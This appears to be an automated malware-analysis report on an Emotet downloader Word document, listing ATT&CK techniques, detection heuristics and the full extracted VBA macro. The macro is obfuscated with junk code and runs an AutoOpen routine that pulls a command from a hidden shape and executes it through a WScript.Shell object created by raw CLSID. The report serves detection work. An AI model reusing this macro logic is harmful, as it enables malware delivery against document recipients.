MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage the WScript.Shell COM object to execute arbitrary commands. Specifically, it constructs and executes a command that appears to download and save a second-stage payload using PowerShell. The presence of the 'AutoOpen' macro and the 'cmd.exe' invocation strongly suggest a downloader functionality, consistent with Emotet's typical behavior.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826428-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826428-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7101 bytes |
SHA-256: 6d0928e18f206fbcf2557097bb69536455f47f03a65964514d34361a2b4d9ba9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
81 of 140 identifiers look randomly generated (e.g. 'QkzddrZwF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LFvMOUDH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each GNqOahcJj In QnSAShnN
VUEtj = 324186903 + Oct(267790199) - 35962565 - CBool(301893 / 19523015) * 248041449 + Log(RWajfaNf - CLng(182456325)) - 12662481 + Hex(rOozwzm)
Next
Select Case CoThbCUK
Case 111333709
bcGvCwRr = Cos(134405757)
GZhjTsMi = 293750196
Case 1430403
GNViszowd = Sqr(77006094 / CSng(107780915 - Cos(320175595 - 301140370) + ZUwMp + Rnd(206111826 - 47077578)))
zacGnNj = Hex(pRQvVOlMJ)
End Select
On Error Resume Next
For Each vXTHwPDo In JaaNokm
riwJSjo = 12555619 + Oct(267648719) - 170155140 - CBool(211835533 / 292010420) * 270725767 + Log(QOUAiZRXX - CLng(262685727)) - 68929297 + Hex(UwiHsbFN)
Next
Select Case uPbcriF
Case 62724399
WwoOJLsnG = Cos(82022272)
TKJzjL = 290973433
Case 156704314
hEmbZWzt = Sqr(158633812 / CSng(252453285 - Cos(311504814 - 77665428) + hQOwGm + Rnd(119207337 - 96839430)))
VtCCj = Hex(cwjmh)
End Select
On Error Resume Next
For Each LRjFpwFB In QfNzc
wsZnZHiCt = 313276589 + Oct(31268410) - 112388666 - CBool(52658254 / 255692241) * 206472109 + Log(UuMNdT - CLng(3874280)) - 121579296 + Hex(SRNpi)
Next
Select Case lYwnnbR
Case 208843991
cPqKkhz = Cos(95028179)
CLTmOUi = 289421116
Case 48464696
HqUMKVTs = Sqr(75251326 / CSng(339518029 - Cos(290901400 - 253639720) + OklOd + Rnd(278867350 - 220706598)))
UDqnXGw = Hex(cJvUj)
End Select
On Error Resume Next
For Each QkzddrZwF In YiznO
AuDzJ = 230640565 + Oct(27007682) - 332786226 - CBool(128204748 / 8269376) * 170551415 + Log(aCNiDX - CLng(38054539)) - 39295480 + Hex(ziFcTajPc)
Next
Select Case ampfaFt
Case 243486468
jBJcSLWD = Cos(267269743)
iahIHAMzX = 275219642
Case 53818524
iqazakX = Sqr(256784057 / CSng(192752098 - Cos(63254733 - 251825007) + ZwpGnRz + Rnd(156090911 - 289622425)))
zAtiiiO = Hex(WvZJS)
End Select
Set sqbqdoj = Shapes("GajSAfqNUN")
On Error Resume Next
For Each CiofPPSUm In JGUDHDNAk
kjKrifwB = 243992962 + Oct(245555526) - 126559194 - CBool(292664415 / 15402262) * 183984654 + Log(lWvGw - CLng(193703658)) - 293188912 + Hex(LhzCn)
Next
Select Case ZpEHNFSYz
Case 5545639
TRjBWRDs = Cos(335245964)
hStmGsc = 334795808
Case 61929764
cIGLvOl = Sqr(271105995 / CSng(148033157 - Cos(252211903 - 85597194) + uWiMJGo + Rnd(109670263 - 316071143)))
oYsXKU = Hex(NqZnW)
End Select
NbihT = "" + WKsiSTi + XFHjO + IHXXH + DQiJwn + sqbqdoj.TextFrame.TextRange.Text + OUBlAj + ocPkznN + UPvopqc
On Error Resume Next
For Each wmmnLzJV In oMJho
fQiKTQCAn = 341327456 + Oct(8727488) - 210290617 - CBool(163267626 / 129061935) * 163843413 + Log(dEzdlDwO - CLng(197884473)) - 107861224 + Hex(KoIsvX)
Next
Select Case jjwPzPvmz
Case 260083087
TkCjD = Cos(232203053)
hKMbU = 136995925
Case 212881204
FsMfH = Sqr(41335030 / CSng(55293398 - Cos(185726603 - 237289855) + oOEjizDI + Rnd(24149154 - 71608706)))
IakYnNNk = Hex(PbiwJ)
End Select
Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
On Error Resume Next
For Each pTCqrX In noiRVzGmG
hiKUs = 151849952 + Oct(15692355) - 116185978 - CBool(233991464 / 95501929) * 302867079 + Log(VRokHAM - CLng(124334041)) - 90093407 + Hex(rnjvUssZF)
Next
Select Case sLdjEwzwA
Case 160441572
IDNSR = Cos(189508338)
rGZnolmX = 242519610
Case 321484578
JZJIv = Sqr(222087830 / CSng(68193071 - Cos(263987552 - 52286744) + LDPSpnjk + Rnd(144653736 - 191075549)))
QHizY = Hex(WruhL)
End Select
Const zYXRLdMGf = 0
On Error Resume Next
For Each jvzjWqmDU In HGfApsJI
LYzYwP = 165597555 + Oct(86376666) - 52254248 - CBool(284224542 / 114594614) * 14719510 + Log(DEVZiJS - CLng(296350119)) - 275387566 + Hex(AtnvWvYs)
Next
Select Case lXjXhW
Case 336350581
zdiMCi = Cos(246818269)
biPNz = 273116834
Case 177178822
mwfKUCR = Sqr(232687051 / CSng(330933894 - Cos(26202110 - 108348466) + TjnDfsUPL + Rnd(172752940 - 327989873)))
CruQIf = Hex(wwNljr)
End Select
On Error Resume Next
For Each lEZibjU In LUvItldA
AqLuGszB = 97801362 + Oct(294320289) - 132735290 - CBool(56373126 / 175826934) * 200941649 + Log(isQBVV - CLng(237657695)) - 68525647 + Hex(mswQqHi)
Next
Select Case zmvIwhi
Case 76693316
hMoAikp = Cos(179947327)
BUbiRQf = 233973021
Case 50058928
vjLHOp = Sqr(61363776 / CSng(262723382 - Cos(232460995 - 79161552) + LlqvoXWb + Rnd(56457889 - 50992434)))
pQFJC = Hex(VicMZQ)
End Select
CKLZrpfQH.Run! NbihT, zYXRLdMGf
On Error Resume Next
For Each nNTFFJUOv In AfzCl
BUkqI = 210955253 + Oct(32331301) - 28177547 - CBool(253145123 / 139736334) * 198952242 + Log(fwPZOWbnL - CLng(262133406)) - 251281561 + Hex(icjkibbY)
Next
Select Case vIzMzo
Case 51291228
OSkfa = Cos(230715118)
tbQaazsNi = 337726676
Case 73707196
zUZLuGaj = Sqr(264484148 / CSng(118606091 - Cos(85941343 - 115795379) + TiwUBFEt + Rnd(225117020 - 280668151)))
KAzVC = Hex(PNmIIooHq)
End Select
On Error Resume Next
For Each skTEaJbw In CVXjiBf
EMLiKb = 83180924 + Oct(288302224) - 75934773 - CBool(315011749 / 260037369) * 130989071 + Log(mdVEZT - CLng(109486038)) - 146151880 + Hex(MwHrPb)
Next
Select Case HjzuRKOFF
Case 223141062
GMPNn = Cos(191392768)
QrCbE = 220335717
Case 99063698
tAMXTLkzE = Sqr(101687224 / CSng(262677007 - Cos(168655391 - 340282365) + PQwsKKJ + Rnd(316363973 - 335269185)))
ihzkqf = Hex(SfbRNsi)
End Select
On Error Resume Next
For Each clUEmKiJ In caNNiLPj
AqRPBs = 27646222 + Oct(146528149) - 159393842 - CBool(177382718 / 131262164) * 196071723 + Log(phaBaTswq - CLng(215699555)) - 118474896 + Hex(ihrpjjKK)
Next
Select Case LzXMk
Case 186684048
QmDpI = Cos(243030207)
fmhkwrNK = 67042207
Case 341241116
SLMhrrJ = Sqr(123983316 / CSng(241574423 - Cos(193895227 - 224655750) + oqrsi + Rnd(26784235 - 194234344)))
czvLCwz = Hex(TtBpXh)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.